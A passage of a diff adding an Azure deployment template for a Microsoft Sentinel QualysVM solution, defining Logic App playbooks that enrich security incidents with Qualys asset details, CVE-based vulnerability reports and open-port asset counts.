"2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId2'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId2')]", + "contentId": "[variables('_playbookContentId2')]", + "kind": "Playbook", + "version": "[variables('playbookVersion2')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-GetAssetDetails", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Get IP Addresses from incident. \n 2. Get Asset Details for all IP Addresses. \n 3. Add asset details as a comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-15T22:25:52Z", + "entities": [ + "IP" + ], + "tags": [ + "Qualys", + "Enrichment", + "VM Report" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId2')]", + "contentKind": "Playbook", + "displayName": "QualysVM-GetAssetDetails", + "contentProductId": "[variables('_playbookcontentProductId2')]", + "id": "[variables('_playbookcontentProductId2')]", + "version": "[variables('playbookVersion2')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName3')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-GetAssets-ByCVEID Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion3')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-GetAssets-ByCVEID", + "type": "string", + "metadata": { + "description": "Name of the logic app resource to be created." + } + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + }, + "StorageAccountName": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Name of the storage account to store Qualys reports." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "AzureBlobStorageName": "[[parameters('StorageAccountName')]", + "AzureblobConnectionName": "[[concat('Azureblob-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "StorageAccountId": "[[resourceId('Microsoft.Storage/storageAccounts', variables('AzureBlobStorageName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]", + "_connection-3": "[[variables('connection-3')]", + "connection-4": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-4": "[[variables('connection-4')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Create_SAS_URI_by_path_(V2)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

Following Qualys VM Scan Report Generated: @{body('Create_SAS_URI_by_path_(V2)')?['WebUrl']}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Create_Dynamic_Search_List_of_CVEs": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_CVEIDs": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/qid/search_list/dynamic/", + "queries": { + "action": "create", + "cve_ids": "@{join(variables('CVEID'), ',')}", + "title": "@{concat('SentinelSearchList_', utcNow())}" + } + } + }, + "Create_SAS_URI_by_path_(V2)": { + "runAfter": { + "Create_blob_(V2)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "Permissions": "Read" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent('AccountNameFromSettings')}/CreateSharedLinkByPath", + "queries": { + "path": "@body('Create_blob_(V2)')?['Path']" + } + } + }, + "Create_Scan_Report_Template": { + "runAfter": { + "Parse_Create_Dynamic_Search_List_Output_JSON": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n\n \n <INFO key=\"title\">\n <![CDATA[@{concat('SentinelScanReportTemplate_', utcNow())}]]>\n </INFO>\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\t\t\n \n \n\t\t\n \n \n\t\t\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\t\t\n \n \n \n \n \n \n \n \n \n \n \n\t\t\n \n \n \n", + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "create", + "report_format": "xml" + } + } + }, + "Create_blob_(V2)": { + "runAfter": { + "Download_Report": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "@body('Download_Report')", + "headers": { + "ReadFileMetadataFromServer": true + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent(encodeURIComponent('AccountNameFromSettings'))}/files", + "queries": { + "folderPath": "/report-blob", + "name": "@{concat('ScanReport_', utcNow())}", + "queryParametersSingleEncoded": true + } + }, + "runtimeConfiguration": { + "contentTransfer": { + "transferMode": "Chunked" + } + } + }, + "Delay_1_Minute_": { + "runAfter": { + "Set_variable_-_ReportID": [ + "Succeeded" + ] + }, + "type": "Wait", + "inputs": { + "interval": { + "count": 1, + "unit": "Minute" + } + } + }, + "Delete_Dynamic_Search_List": { + "runAfter": { + "Add_comment_to_incident_(V3)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/qid/search_list/dynamic/", + "queries": { + "action": "delete", + "id": "@body('Parse_Create_Dynamic_Search_List_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Delete_Scan_Report_Template": { + "runAfter": { + "Delete_Dynamic_Search_List": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "delete", + "template_id": "@body('Parse_Create_Report_Template_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Download_Report": { + "runAfter": { + "Wait_Until_Report_Generation_is_Finished": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "fetch", + "id": "@variables('ReportID')" + } + } + }, + "For_each_Alert_in_Incident_get_all_CVEIDs": { + "foreach": "@triggerBody()?['object']?['properties']?['Alerts']", + "actions": { + "For_each_CVEID": { + "foreach": "@body('Parse_Cutom_Details_Section')?['CVEID']", + "actions": { + "Append_to_array_CVEID": { + "type": "AppendToArrayVariable", + "inputs": { + "name": "CVEID", + "value": "@items('For_each_CVEID')" + } + } + }, + "runAfter": { + "Parse_Cutom_Details_Section": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Parse_Additional_Data_Section": { + "type": "ParseJson", + "inputs": { + "content": "@items('For_each_Alert_in_Incident_get_all_CVEIDs')?['properties']?['additionalData']", + "schema": { + "properties": { + "Alert generation status": { + "type": "string" + }, + "AlertMessageEnqueueTime": { + "type": "string" + }, + "Analytic Rule Ids": { + "type": "string" + }, + "Analytic Rule Name": { + "type": "string" + }, + "Correlation Id": { + "type": "string" + }, + "Custom Details": { + "type": [ + "string", + "null" + ] + }, + "Data Sources": { + "type": "string" + }, + "Event Grouping": { + "type": "string" + }, + "ProcessedBySentinel": { + "type": "string" + }, + "Query": { + "type": "string" + }, + "Query End Time UTC": { + "type": "string" + }, + "Query Period": { + "type": "string" + }, + "Query Start Time UTC": { + "type": "string" + }, + "Search Query Results Overall Count": { + "type": "string" + }, + "Trigger Operator": { + "type": "string" + }, + "Trigger Threshold": { + "type": "string" + } + }, + "type": "object" + } + } + }, + "Parse_Cutom_Details_Section": { + "runAfter": { + "Parse_Additional_Data_Section": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Parse_Additional_Data_Section')?['Custom Details']", + "schema": { + "properties": { + "CVEID": { + "items": { + "type": "string" + }, + "type": "array" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_ReportID": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Get_Report_Status": { + "runAfter": { + "Delay_1_Minute_": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(variables('ReportID'))" + } + } + }, + "Initialize_variable_-_CVEID": { + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "CVEID", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_ReportID": { + "runAfter": { + "Initialize_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ReportID", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ReportStatus": { + "runAfter": { + "Initialize_variable_-_CVEID": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ReportStatus", + "type": "string" + } + ] + } + }, + "Launch_Scan_Report": { + "runAfter": { + "Parse_Create_Report_Template_Output_JSON": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "launch", + "output_format": "pdf", + "report_title": "@{concat('SentinelScanReport_', utcNow())}", + "report_type": "Scan", + "template_id": "@body('Parse_Create_Report_Template_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Parse_Create_Dynamic_Search_List_Output_JSON": { + "runAfter": { + "Create_Dynamic_Search_List_of_CVEs": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Dynamic_Search_List_of_CVEs')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Create_Report_Template_Output_JSON": { + "runAfter": { + "Create_Scan_Report_Template": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Scan_Report_Template')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Launch_Scan_Report_Output_JSON": { + "runAfter": { + "Launch_Scan_Report": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Launch_Scan_Report')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Report_Status_JSON": { + "runAfter": { + "Get_Report_Status": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Set_variable_-_ReportID": { + "runAfter": { + "Parse_Launch_Scan_Report_Output_JSON": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportID", + "value": "@body('Parse_Launch_Scan_Report_Output_JSON')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + }, + "Set_variable_-_ReportStatus": { + "runAfter": { + "Parse_Report_Status_JSON": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status_JSON')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + }, + "Terminate": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_CVEIDs": [ + "Failed" + ] + }, + "type": "Terminate", + "inputs": { + "runError": { + "code": "FAIL", + "message": "Custom Details mapping in Analytical Rule is missing or misconfigured." + }, + "runStatus": "Failed" + } + }, + "Wait_Until_Report_Generation_is_Finished": { + "actions": { + "Delay_for_3_minutes": { + "type": "Wait", + "inputs": { + "interval": { + "count": 3, + "unit": "Minute" + } + } + }, + "Get_Report_Status_Again": { + "runAfter": { + "Delay_for_3_minutes": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(variables('ReportID'))" + } + } + }, + "Parse_Report_Status_JSON_Again": { + "runAfter": { + "Get_Report_Status_Again": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status_Again')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Update_variable_-_ReportStatus_": { + "runAfter": { + "Parse_Report_Status_JSON_Again": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status_JSON_Again')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + } + }, + "runAfter": { + "Set_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "expression": "@equals(variables('ReportStatus'), 'Finished')", + "limit": { + "count": 60, + "timeout": "PT3H" + }, + "type": "Until" + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azureblob": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "connectionName": "[[variables('AzureblobConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "tags": { + "hidden-SentinelTemplateName": "QualysVM-GetAssets-ByCVEID", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('AzureblobConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('AzureblobConnectionName')]", + "api": { + "id": "[[variables('_connection-3')]" + }, + "parameterValues": { + "accountName": "[[variables('AzureBlobStorageName')]", + "accessKey": "[[listKeys(variables('StorageAccountId'), '2019-04-01').keys[0].value]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-4')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId3'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId3')]", + "contentId": "[variables('_playbookContentId3')]", + "kind": "Playbook", + "version": "[variables('playbookVersion3')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-GetAssets-ByCVEID", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Get CVE IDs from incident. \n 2. Create a Dynamic Search List with CVE IDs as filter criteria. \n 3. Generate the Vulnerability Report based on Dynamic Search List. \n 4. Download the report and store it to a blob storage. This report has details about assets which are vulnerable to CVE. \n 5. Add the link of report as a comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-13T22:25:52Z", + "tags": [ + "Qualys", + "Enrichment", + "VM Report" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId3')]", + "contentKind": "Playbook", + "displayName": "QualysVM-GetAssets-ByCVEID", + "contentProductId": "[variables('_playbookcontentProductId3')]", + "id": "[variables('_playbookcontentProductId3')]", + "version": "[variables('playbookVersion3')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName4')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-GetAssets-ByOpenPort Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion4')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-GetAssets-ByOpenPort", + "type": "string" + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-3": "[[variables('connection-3')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Check_for_Successful_Response": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ], + "Check_if_Successful_Response": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ], + "Terminate": [ + "Skipped" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

@{variables('IncidentCommet')}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Asset_Count_for_Port": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_Ports": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n \n @{first(variables('Ports'))}\n \n", + "headers": { + "Accept": "application/json", + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/qps/rest/2.0/count/am/hostasset" + } + }, + "Check_for_Successful_Response": { + "actions": { + "Append_to_IncidentComment": { + "runAfter": { + "Compose_Incident_Comment_with_Count_Details": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "@{outputs('Compose_Incident_Comment_with_Count_Details')}\n" + } + }, + "Compose_Incident_Comment_with_Count_Details": { + "type": "Compose", + "inputs": "Total Hosts Count with Open Port @{join(variables('Ports'), ',')}: @{body('Parse_Asset_Count_JSON')?['ServiceResponse']?['count']}\n" + } + }, + "runAfter": { + "Parse_Asset_Count_JSON": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_Asset_Count_Failure_msg_to_Incident_Comment": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "Asset Count Qualys API call failed.\n @{slice(string(body('Parse_Asset_Count_JSON')), 0, 1000)}\n" + } + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@body('Parse_Asset_Count_JSON')?['ServiceResponse']?['responseCode']", + "SUCCESS" + ] + } + ] + }, + "type": "If" + }, + "Check_if_Successful_Response": { + "actions": { + "Append_to_Incident_Comment": { + "runAfter": { + "Create_HTML_table": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "Result is 